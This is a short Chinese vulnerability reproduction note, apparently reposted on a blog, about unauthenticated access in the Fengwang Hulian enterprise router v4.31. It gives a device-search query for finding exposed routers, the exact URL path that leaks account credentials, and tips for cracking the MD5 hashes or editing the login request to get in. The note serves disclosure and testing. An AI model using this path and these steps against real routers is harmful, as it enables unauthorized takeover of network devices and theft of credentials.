漏洞描述
蜂网互联企业级路由器v4.31存在接口未授权访问,导致攻击者可以是通过此漏洞得到路由器账号密码接管路由器
漏洞影响
蜂网互联企业级路由器v4.31
网络测绘
app=“蜂网互联-互联企业级路由器”
漏洞复现
payload
http://ip:port/action/usermanager.htm
存在未授权访问,可通过直接访问获得账号密码
一眼MD5,可以上各大解密网站解密,也可以直接修改登陆包进行登录
发布者:admin,转转请注明出处:http://www.yc00.com/web/1754356439a5151636.html
评论列表(0条)